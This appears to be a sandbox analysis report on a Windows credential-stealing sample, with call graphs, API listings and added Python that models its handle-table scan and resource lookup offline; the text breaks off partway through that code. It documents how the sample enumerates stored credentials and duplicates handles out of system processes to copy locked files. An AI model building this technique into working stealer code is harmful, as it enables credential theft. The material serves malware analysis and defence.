API calls 38296->38304 38729 40a706 38296->38729 38305 40bdb0 38297->38305 38746 4053fe 39 API calls 38298->38746 38304->38296 38914 404363 38305->38914 38308 40bf5d 38934 40440c 38308->38934 38310 40bdee 38310->38308 38313 40b2cc 27 API calls 38310->38313 38311 40bddf CredEnumerateW 38311->38310 38314 40be02 wcslen 38313->38314 38314->38308 38316 40be1e 38314->38316 38315 40be26 wcsncmp 38315->38316 38316->38308 38316->38315 38319 40be7d memset 38316->38319 38320 40bea7 memcpy 38316->38320 38321 40bf11 wcschr 38316->38321 38322 40b2cc 27 API calls 38316->38322 38324 40bf43 LocalFree 38316->38324 38937 40bd5d 28 API calls 38316->38937 38938 404423 38316->38938 38319->38316 38319->38320 38320->38316 38320->38321 38321->38316 38323 40bef6 _wcsnicmp 38322->38323 38323->38316 38323->38321 38324->38316 38325 4135f7 38951 4135e0 38325->38951 38328 40b2cc 27 API calls 38329 41360d 38328->38329 38330 40a804 8 API calls 38329->38330 38331 413613 38330->38331 38332 41361b 38331->38332 38333 41363e 38331->38333 38334 40b273 27 API calls 38332->38334 38335 4135e0 FreeLibrary 38333->38335 38336 413625 GetProcAddress 38334->38336 38337 413643 38335->38337 38336->38333 38338 413648 38336->38338 38337->38093 38339 413658 38338->38339 38340 4135e0 FreeLibrary 38338->38340 38339->38093 38341 413666 38340->38341 38341->38093 38954 4449b9 38342->38954 38345 444c1f 38345->38078 38346 4449b9 42 API calls 38348 444b4b 38346->38348 38347 444c15 38349 4449b9 42 API calls 38347->38349 38348->38347 38975 444972 GetVersionExW 38348->38975 38349->38345 38351 444b99 memcmp 38356 444b8c 38351->38356 38352 444c0b 38979 444a85 42 API calls 38352->38979 38356->38351 38356->38352 38976 444aa5 42 API calls 38356->38976 38977 40a7a0 GetVersionExW 38356->38977 38978 444a85 42 API calls 38356->38978 38359 40399d 38358->38359 38980 403a16 38359->38980 38361 403a09 38994 40b1ab free free 38361->38994 38363 4039a3 38363->38361 38367 4039f4 38363->38367 38991 40a02c CreateFileW 38363->38991 38364 403a12 
Execution Graph (call-graph figure; only the node and edge labels of one part of the graph survived extraction). In the export each node reads `<node id> <function address> <API names, or "N API calls" for a collapsed subgraph>` and each edge reads `<caller node>-><callee node>`; the raw node/edge text has been condensed here. Functions in this part of the graph (addresses 0x4039ca-0x44dec3) whose labels name Win32 APIs, grouped by what the API sequence does (the grouping is the editor's reading of the page's own labels):

Process enumeration: 413d65 CreateToolhelp32Snapshot / Process32FirstW, 413f00 Process32NextW, 413da5 OpenProcess, 413f37 K32GetModuleFileNameExW, 413ce3 GetProcessTimes, 413e37/413cb0 GetModuleHandleW, 413e46/413cbf GetProcAddress, 413f17/413ea2 CloseHandle
Handle duplication and copy to a temp file: 40e08d OpenProcess, 40e0a4 GetCurrentProcess DuplicateHandle, 40e0d0 GetFileSize, 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW, 4096dc CreateFileW, 40e0f1 CreateFileMappingW, 40e10b MapViewOfFile, 40e11f WriteFile UnmapViewOfFile, 40e59c DeleteFileW
Browser cache enumeration: 40c2fd FindFirstUrlCacheEntryW, 40c35e/40c391 FindNextUrlCacheEntryW, 40c373 GetLastError, 40c3ad FindCloseUrlCache
Registry reads: 414592 RegOpenKeyExW, 4145ac RegQueryValueExW, 40c4e4/40aa23 RegEnumValueW, 414ce9/40c505 RegCloseKey
INI-style configuration: 4144a3 GetPrivateProfileStringW, 41457f GetPrivateProfileIntW, 414495 WritePrivateProfileStringW, 4143f1 memset _itow WritePrivateProfileStringW
File system walking and file copy: 40ae5c FindFirstFileW, 40ae7b FindNextFileW, 40aebe/40aec7 FindClose, 409b98 GetFileAttributesW, 40a051 GetFileTime CloseHandle, 4039ca CompareFileTime, 40b7d4 memset CreateFileW, 40b827 CopyFileW, 40bade DeleteFileW, 40b64c SystemTimeToFileTime FileTimeToLocalFileTime, 4096c3 CreateFileW, 40cc3d GetFileSize, 40a2ef ReadFile, 417570 SetFilePointer, 41760a ReadFile, 406b53 SetFilePointerEx ReadFile, 417bf6 UnmapViewOfFile CloseHandle, 4175ce Sleep
Runtime API resolution (long GetProcAddress chains): 405248 _mbscpy _mbscat GetProcAddress followed by nine 405211 GetProcAddress calls; 40438d-4043e2 GetProcAddress x5; 4449dc-444a48 GetProcAddress x7; 413f5f GetProcAddress x5; 40440c/404413/404475/4135eb/413d2f/44deb5 FreeLibrary
Resource access: 4148b6 FindResourceW, 4148cf SizeofResource, 4148e0 LoadResource, 4148ee LockResource
Environment and string handling: 409cf9 GetVersionExW, 409dd5 GetWindowsDirectoryW wcscpy, 40a6e6/40bc61 WideCharToMultiByte, 40a71b/40a734/40ab4a/40ab7c MultiByteToWideChar, 40c47a _wcsupr, 40a714 _wcslwr, 40bb88/40bd3a LocalFree, plus many memset/memcpy/memcmp/wcscpy/wcscat/wcscmp/_wcsicmp/_snwprintf helper nodes

Collapsed subgraphs in this part of the graph are labelled from "2 API calls" up to "253 API calls" (node 445403).
39841->39846 40018 42c02e memset 39841->40018 39842 43b428 39842->39835 40010 432b60 16 API calls 39842->40010 39843 43afca 39973 423330 11 API calls 39843->39973 40013 4233ae 11 API calls 39845->40013 40019 43a87a 163 API calls 39846->40019 39847 43afdb 39974 4233ae 11 API calls 39847->39974 39853 43b56c 39856 43b58a 39853->39856 40020 423330 11 API calls 39853->40020 39854 43b4b1 40014 423399 11 API calls 39854->40014 39855 43afee 39975 44081d 163 API calls 39855->39975 40021 440f84 12 API calls 39856->40021 39861 43b4c1 40023 42db80 163 API calls 39861->40023 39863 43b592 40022 43a82f 16 API calls 39863->40022 39866 43b5b4 40024 438c4e 163 API calls 39866->40024 39868 43b5cf 40025 42c02e memset 39868->40025 39870 43b005 39870->39765 39872 43b01f 39870->39872 39976 42d836 163 API calls 39870->39976 39871 43b1ef 39986 4233c5 16 API calls 39871->39986 39872->39871 39984 423330 11 API calls 39872->39984 39985 42d71d 163 API calls 39872->39985 39875 43b212 39987 423330 11 API calls 39875->39987 39876 43b087 39977 4233ae 11 API calls 39876->39977 39877 43add4 39877->39820 40026 438f86 16 API calls 39877->40026 39882 43b22a 39988 42ccb5 11 API calls 39882->39988 39884 43b23f 39989 4233ae 11 API calls 39884->39989 39885 43b10f 39980 423330 11 API calls 39885->39980 39887 43b257 39990 4233ae 11 API calls 39887->39990 39891 43b129 39981 4233ae 11 API calls 39891->39981 39892 43b26e 39991 4233ae 11 API calls 39892->39991 39895 43b09a 39895->39885 39978 42cc15 19 API calls 39895->39978 39979 4233ae 11 API calls 39895->39979 39896 43b282 39992 43a87a 163 API calls 39896->39992 39898 43b13c 39982 440f84 12 API calls 39898->39982 39900 43b29d 39993 423330 11 API calls 39900->39993 39903 43b15f 39983 4233ae 11 API calls 39903->39983 39904 43b2af 39906 43b2b8 39904->39906 39907 43b2ce 39904->39907 39994 4233ae 11 API calls 39906->39994 39995 440f84 12 API calls 39907->39995 39910 43b2c9 39997 4233ae 11 API calls 39910->39997 39911 43b2da 39996 42370b memset memcpy memset 
39911->39996 39914 43b2f9 39998 423330 11 API calls 39914->39998 39916 43b30b 39999 423330 11 API calls 39916->39999 39918 43b325 40000 423399 11 API calls 39918->40000 39920 43b332 40001 4233ae 11 API calls 39920->40001 39922 43b354 40002 423399 11 API calls 39922->40002 39924 43b364 40003 43a82f 16 API calls 39924->40003 39926 43b370 40004 42db80 163 API calls 39926->40004 39928 43b380 40005 438c4e 163 API calls 39928->40005 39930 43b39e 40006 423399 11 API calls 39930->40006 39932 43b3ae 40007 43a76c 21 API calls 39932->40007 39934 43b3c3 40008 423399 11 API calls 39934->40008 39936->39757 39937->39759 39938->39762 39940 43a6f5 39939->39940 39946 43a765 39939->39946 39940->39946 40028 42a115 39940->40028 39944 43a73d 39945 42a115 147 API calls 39944->39945 39944->39946 39945->39946 39946->39765 39948 4397fd memset 39946->39948 39947->39767 39948->39774 39949->39765 39950->39789 39951->39778 39952->39783 39953->39779 39954->39782 39955->39787 39956->39791 39957->39793 39958->39797 39959->39805 39960->39802 39961->39806 39962->39877 39963->39799 39964->39807 39965->39811 39966->39812 39967->39812 39968->39821 39969->39825 39970->39830 39971->39836 39972->39843 39973->39847 39974->39855 39975->39870 39976->39876 39977->39895 39978->39895 39979->39895 39980->39891 39981->39898 39982->39903 39983->39872 39984->39872 39985->39872 39986->39875 39987->39882 39988->39884 39989->39887 39990->39892 39991->39896 39992->39900 39993->39904 39994->39910 39995->39911 39996->39910 39997->39914 39998->39916 39999->39918 40000->39920 40001->39922 40002->39924 40003->39926 40004->39928 40005->39930 40006->39932 40007->39934 40008->39877 40009->39842 40010->39835 40011->39840 40012->39845 40013->39854 40014->39861 40015->39827 40016->39834 40017->39841 40018->39846 40019->39853 40020->39856 40021->39863 40022->39861 40023->39866 40024->39868 40025->39877 40026->39820 40027->39765 40029 42a175 40028->40029 40031 42a122 40028->40031 40029->39946 40034 42b13b 147 API calls 40029->40034 
40031->40029 40032 42a115 147 API calls 40031->40032 40035 43a174 40031->40035 40059 42a0a8 147 API calls 40031->40059 40032->40031 40034->39944 40049 43a196 40035->40049 40050 43a19e 40035->40050 40036 43a306 40036->40049 40079 4388c4 14 API calls 40036->40079 40039 42a115 147 API calls 40039->40050 40041 43a642 40041->40049 40083 4169a7 11 API calls 40041->40083 40045 43a635 40082 42c02e memset 40045->40082 40049->40031 40050->40036 40050->40039 40050->40049 40060 42ff8c 40050->40060 40068 415a91 40050->40068 40072 4165ff 40050->40072 40075 439504 13 API calls 40050->40075 40076 4312d0 147 API calls 40050->40076 40077 42be4c memcpy memcpy memcpy memset memcpy 40050->40077 40078 43a121 11 API calls 40050->40078 40052 4169a7 11 API calls 40053 43a325 40052->40053 40053->40041 40053->40045 40053->40049 40053->40052 40054 42b5b5 memset memcpy 40053->40054 40055 42bf4c 14 API calls 40053->40055 40058 4165ff 11 API calls 40053->40058 40080 42b63e 14 API calls 40053->40080 40081 42bfcf memcpy 40053->40081 40054->40053 40055->40053 40058->40053 40059->40031 40084 43817e 40060->40084 40062 42ff99 40063 42ffe3 40062->40063 40064 42ffd0 40062->40064 40067 42ff9d 40062->40067 40089 4169a7 11 API calls 40063->40089 40088 4169a7 11 API calls 40064->40088 40067->40050 40069 415a9d 40068->40069 40070 415ab3 40069->40070 40071 415aa4 memset 40069->40071 40070->40050 40071->40070 40236 4165a0 40072->40236 40075->40050 40076->40050 40077->40050 40078->40050 40079->40053 40080->40053 40081->40053 40082->40041 40083->40049 40085 438187 40084->40085 40087 438192 40084->40087 40090 4380f6 40085->40090 40087->40062 40088->40067 40089->40067 40092 43811f 40090->40092 40091 438164 40091->40087 40092->40091 40094 4300e8 3 API calls 40092->40094 40095 437e5e 40092->40095 40094->40092 40118 437d3c 40095->40118 40097 437eb3 40097->40092 40098 437ea9 40098->40097 40103 437f22 40098->40103 40133 41f432 40098->40133 40101 437f06 40180 415c56 11 API calls 40101->40180 40105 437f7f 40103->40105 
40106 432d4e 3 API calls 40103->40106 40104 437f95 40181 415c56 11 API calls 40104->40181 40105->40104 40107 43802b 40105->40107 40106->40105 40109 4165ff 11 API calls 40107->40109 40110 438054 40109->40110 40144 437371 40110->40144 40113 43806b 40114 438094 40113->40114 40182 42f50e 138 API calls 40113->40182 40116 437fa3 40114->40116 40117 4300e8 3 API calls 40114->40117 40116->40097 40183 41f638 104 API calls 40116->40183 40117->40116 40119 437d69 40118->40119 40122 437d80 40118->40122 40184 437ccb 11 API calls 40119->40184 40121 437d76 40121->40098 40122->40121 40123 437da3 40122->40123 40125 437d90 40122->40125 40126 438460 134 API calls 40123->40126 40125->40121 40188 437ccb 11 API calls 40125->40188 40129 437dcb 40126->40129 40127 437de8 40187 424f26 123 API calls 40127->40187 40129->40127 40185 444283 13 API calls 40129->40185 40131 437dfc 40186 437ccb 11 API calls 40131->40186 40134 41f54d 40133->40134 40140 41f44f 40133->40140 40135 41f466 40134->40135 40218 41c635 memset memset 40134->40218 40135->40101 40135->40103 40140->40135 40142 41f50b 40140->40142 40189 41f1a5 40140->40189 40214 41c06f memcmp 40140->40214 40215 41f3b1 90 API calls 40140->40215 40216 41f398 86 API calls 40140->40216 40142->40134 40142->40135 40217 41c295 86 API calls 40142->40217 40219 41703f 40144->40219 40146 437399 40147 43739d 40146->40147 40149 4373ac 40146->40149 40226 4446ea 11 API calls 40147->40226 40150 416935 16 API calls 40149->40150 40151 4373ca 40150->40151 40152 438460 134 API calls 40151->40152 40157 4251c4 137 API calls 40151->40157 40161 415a91 memset 40151->40161 40164 43758f 40151->40164 40176 437584 40151->40176 40179 437d3c 135 API calls 40151->40179 40227 425433 13 API calls 40151->40227 40228 425413 17 API calls 40151->40228 40229 42533e 16 API calls 40151->40229 40230 42538f 16 API calls 40151->40230 40231 42453e 123 API calls 40151->40231 40152->40151 40153 4375bc 40155 415c7d 16 API calls 40153->40155 40156 4375d2 40155->40156 40158 4442e6 11 API calls 
40156->40158 40178 4373a7 40156->40178 40157->40151 40159 4375e2 40158->40159 40159->40178 40234 444283 13 API calls 40159->40234 40161->40151 40232 42453e 123 API calls 40164->40232 40167 4375f4 40170 437620 40167->40170 40171 43760b 40167->40171 40169 43759f 40172 416935 16 API calls 40169->40172 40174 416935 16 API calls 40170->40174 40235 444283 13 API calls 40171->40235 40172->40176 40174->40178 40176->40153 40233 42453e 123 API calls 40176->40233 40177 437612 memcpy 40177->40178 40178->40113 40179->40151 40180->40097 40181->40116 40182->40114 40183->40097 40184->40121 40185->40131 40186->40127 40187->40121 40188->40121 40190 41bc3b 101 API calls 40189->40190 40191 41f1b4 40190->40191 40192 41edad 86 API calls 40191->40192 40199 41f282 40191->40199 40193 41f1cb 40192->40193 40194 41f1f5 memcmp 40193->40194 40195 41f20e 40193->40195 40193->40199 40194->40195 40196 41f21b memcmp 40195->40196 40195->40199 40197 41f326 40196->40197 40200 41f23d 40196->40200 40198 41ee6b 86 API calls 40197->40198 40197->40199 40198->40199 40199->40140 40200->40197 40201 41f28e memcmp 40200->40201 40203 41c8df 56 API calls 40200->40203 40201->40197 40202 41f2a9 40201->40202 40202->40197 40205 41f308 40202->40205 40206 41f2d8 40202->40206 40204 41f269 40203->40204 40204->40197 40207 41f287 40204->40207 40208 41f27a 40204->40208 40205->40197 40212 4446ce 11 API calls 40205->40212 40209 41ee6b 86 API calls 40206->40209 40207->40201 40210 41ee6b 86 API calls 40208->40210 40211 41f2e0 40209->40211 40210->40199 40213 41b1ca memset 40211->40213 40212->40197 40213->40199 40214->40140 40215->40140 40216->40140 40217->40134 40218->40135 40220 417044 40219->40220 40221 41705c 40219->40221 40223 416760 11 API calls 40220->40223 40225 417055 40220->40225 40222 417075 40221->40222 40224 41707a 11 API calls 40221->40224 40222->40146 40223->40225 40224->40220 40225->40146 40226->40178 40227->40151 40228->40151 40229->40151 40230->40151 40231->40151 40232->40169 40233->40153 40234->40167 
40235->40177 40241 415cfe 40236->40241 40242 41628e 40241->40242 40248 415d23 __aullrem __aulldvrm 40241->40248 40249 416520 40242->40249 40243 4163ca 40255 416422 11 API calls 40243->40255 40245 416172 memset 40245->40248 40246 415cb9 10 API calls 40246->40248 40247 416422 10 API calls 40247->40248 40248->40242 40248->40243 40248->40245 40248->40246 40248->40247 40250 416527 40249->40250 40254 416574 40249->40254 40252 416544 40250->40252 40250->40254 40256 4156aa 11 API calls 40250->40256 40253 416561 memcpy 40252->40253 40252->40254 40253->40254 40254->40050 40255->40242 40256->40252 40257 441819 40260 430737 40257->40260 40259 441825 40261 430756 40260->40261 40273 43076d 40260->40273 40262 430774 40261->40262 40263 43075f 40261->40263 40275 43034a memcpy 40262->40275 40274 4169a7 11 API calls 40263->40274 40266 4307ce 40268 430819 memset 40266->40268 40276 415b2c 11 API calls 40266->40276 40267 43077e 40267->40266 40271 4307fa 40267->40271 40267->40273 40268->40273 40270 4307e9 40270->40268 40270->40273 40277 4169a7 11 API calls 40271->40277 40273->40259 40274->40273 40275->40267 40276->40270 40277->40273 40278 41493c EnumResourceNamesW

                                                                            Control-flow Graph
                                                                            [Graph rendering and edge list omitted. Basic blocks with API calls, in graph order: 40dd85 memset, call 409bca, CreateFileW; 40ddf1 call 40afcf, call 41352f; 40de0b NtQuerySystemInformation; 40de29 loops back to 40ddf1; 40de3b CloseHandle, GetCurrentProcessId; 40de7a call 413cfa, call 413d4c; 40de94 call 40e6ad, call 409c52, _wcsicmp; 40debd _wcsicmp; 40ded0 _wcsicmp; 40dee7 OpenProcess; 40df23 GetCurrentProcess, DuplicateHandle; 40df4c memset, call 41352f; 40df8f CloseHandle, call 409c52 (x2), _wcsicmp; 40dfef CloseHandle; 40e00c call 413d29.]
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                            • API String ID: 708747863-3398334509
                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
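Reading the argument dump together with the graph: the function opens its own image (GetModuleFileNameW feeding CreateFileW with GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING), calls NtQuerySystemInformation with class 0x10 (SystemHandleInformation) from a loop that returns to the allocation block, compares the image names of handle-owning processes case-insensitively against dllhost.exe, taskhost.exe and taskhostex.exe, and duplicates handles out of matching processes with OpenProcess(0x40 = PROCESS_DUP_HANDLE) and DuplicateHandle. The C0000004 values in the dump are STATUS_INFO_LENGTH_MISMATCH, consistent with a resize-and-retry loop around the query. The following is an added example, not code from the sample or from Joe Sandbox, that models that loop and parses the 32-bit SYSTEM_HANDLE_INFORMATION layout offline; the handle table, the PID-to-image map (standing in for what the toolhelp walk at 413d4c, listed next, likely supplies) and the buffer growth policy are assumptions.

```python
"""Offline model of the handle scan at 0040DD85 (NtQuerySystemInformation class 0x10).

Added example, not code from the sample or from Joe Sandbox. Struct layouts are
the documented 32-bit SYSTEM_HANDLE_INFORMATION / SYSTEM_HANDLE_TABLE_ENTRY_INFO
(the sample is a 32-bit image); the handle table, PID-to-image map and buffer
growth policy are constructed assumptions.
"""
import struct

SYSTEM_HANDLE_INFORMATION = 0x10
STATUS_SUCCESS = 0x00000000
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
PROCESS_DUP_HANDLE = 0x40                      # the OpenProcess access mask in the dump
TARGET_IMAGES = {"dllhost.exe", "taskhost.exe", "taskhostex.exe"}   # strings in the function

# 32-bit SYSTEM_HANDLE_TABLE_ENTRY_INFO: USHORT UniqueProcessId, USHORT CreatorBackTraceIndex,
# UCHAR ObjectTypeIndex, UCHAR HandleAttributes, USHORT HandleValue, PVOID Object, ULONG GrantedAccess
ENTRY = struct.Struct("<HHBBHII")              # 16 bytes


def build_handle_table(entries):
    """Constructed stand-in for the kernel's answer: ULONG NumberOfHandles + packed entries."""
    body = b"".join(ENTRY.pack(pid, 0, typ, 0, handle, obj, access)
                    for pid, typ, handle, obj, access in entries)
    return struct.pack("<I", len(entries)) + body


def fake_nt_query_system_information(table):
    """Mimic the length contract of the real call for one fixed table."""
    def query(info_class, buf_len):
        if info_class != SYSTEM_HANDLE_INFORMATION:
            raise ValueError("only SystemHandleInformation is modelled")
        if buf_len < len(table):
            return STATUS_INFO_LENGTH_MISMATCH, None, len(table)
        return STATUS_SUCCESS, table, len(table)
    return query


def query_handles(nt_query, initial_len=0x1000):
    """Allocate, query, and retry with a bigger buffer while the call reports
    STATUS_INFO_LENGTH_MISMATCH; the graph's back edge 40de29 -> 40ddf1 is this loop.
    Doubling-or-needed is an assumed growth policy, not recovered from the sample."""
    buf_len = initial_len
    while True:
        status, data, needed = nt_query(SYSTEM_HANDLE_INFORMATION, buf_len)
        if status == STATUS_SUCCESS:
            return data
        if status != STATUS_INFO_LENGTH_MISMATCH:
            raise OSError(f"NtQuerySystemInformation failed: {status:#010x}")
        buf_len = max(buf_len * 2, needed)


def parse_handle_table(data):
    """Unpack the table into dicts; each entry's PID is the handle's owning process."""
    (count,) = struct.unpack_from("<I", data, 0)
    out = []
    for i in range(count):
        pid, _bt, typ, _attr, handle, obj, access = ENTRY.unpack_from(data, 4 + i * ENTRY.size)
        out.append({"pid": pid, "type": typ, "handle": handle, "object": obj, "access": access})
    return out


def handles_in_target_processes(data, pid_to_image):
    """Keep handles owned by processes whose image base name matches the hard-coded
    list, case-insensitively (the _wcsicmp calls). These are the handles the function
    would duplicate out with OpenProcess(PROCESS_DUP_HANDLE) + DuplicateHandle."""
    def base_name(path):
        return path.rsplit("\\", 1)[-1].lower()
    return [e for e in parse_handle_table(data)
            if base_name(pid_to_image.get(e["pid"], "")) in TARGET_IMAGES]


if __name__ == "__main__":
    table = build_handle_table([(1234, 0x1C, 0x44, 0x8A000000, 0x120089),
                                (4321, 0x1C, 0x48, 0x8A000010, 0x120089),
                                (1234, 0x07, 0x4C, 0x8A000020, 0x1FFFFF)])
    data = query_handles(fake_nt_query_system_information(table), initial_len=16)
    for h in handles_in_target_processes(data, {1234: r"C:\Windows\System32\DllHost.exe",
                                                4321: "explorer.exe"}):
        print(f"pid {h['pid']} handle {h['handle']:#06x} type {h['type']}")
```

Starting with a 16-byte buffer forces the retry path once before the 52-byte table fits; on a real system the same loop runs against a table of tens of thousands of entries, which is why the sample's first call uses a 0x1000-byte buffer and the dump shows the mismatch status.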

                                                                            Control-flow Graph
                                                                            [Graph rendering and edge list omitted. Basic blocks with API calls: 413d4c call 40b633, CreateToolhelp32Snapshot, memset, Process32FirstW; 413f00 Process32NextW (loop head); 413da5 OpenProcess; 413df3 memset, call 413f27; 413e37 GetModuleHandleW; 413e46 GetProcAddress; 413e79 call 413959, call 413ca4; 413ea2 CloseHandle; 413ebf free; 413ec8 call 4099f4; 413f17 CloseHandle.]
                                                                            APIs
                                                                              • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                            • memset.MSVCRT ref: 00413D7F
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                            • memset.MSVCRT ref: 00413E07
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                            • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                            • free.MSVCRT ref: 00413EC1
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                            • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                            • API String ID: 1344430650-1740548384
                                                                            • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                            • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                                                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                            • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                            • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                            • String ID: BIN
                                                                            • API String ID: 1668488027-1015027815
                                                                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
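The argument listing reads FindResourceW(hModule=0, lpName=0x32, lpType=L"BIN"): a resource with integer ID 50 under the custom type "BIN" in the sample's own image, copied out with memcpy after LoadResource, SizeofResource and LockResource. The same blob can be pulled from a dump without executing anything by walking the .rsrc directory the way the loader does. The following is an added example, not code from the sample or from Joe Sandbox; the section RVA and the payload bytes are constructed, and the only identifiers taken from the listing are the type "BIN" and the ID 0x32.

```python
"""Offline lookup of the resource fetched at 0040B5A5: FindResourceW(0, MAKEINTRESOURCE(0x32), L"BIN").

Added example, not code from the sample or from Joe Sandbox. It walks an
IMAGE_RESOURCE_DIRECTORY tree (type -> name -> language -> data entry) the way the
loader does, so the blob can be copied out of a dump without running it. The .rsrc
section built here and its payload are constructed; only the type "BIN" and the
ID 0x32 come from the argument listing.
"""
import struct

RES_DIR = struct.Struct("<IIHHHH")    # IMAGE_RESOURCE_DIRECTORY, 16 bytes
RES_ENTRY = struct.Struct("<II")      # IMAGE_RESOURCE_DIRECTORY_ENTRY, 8 bytes
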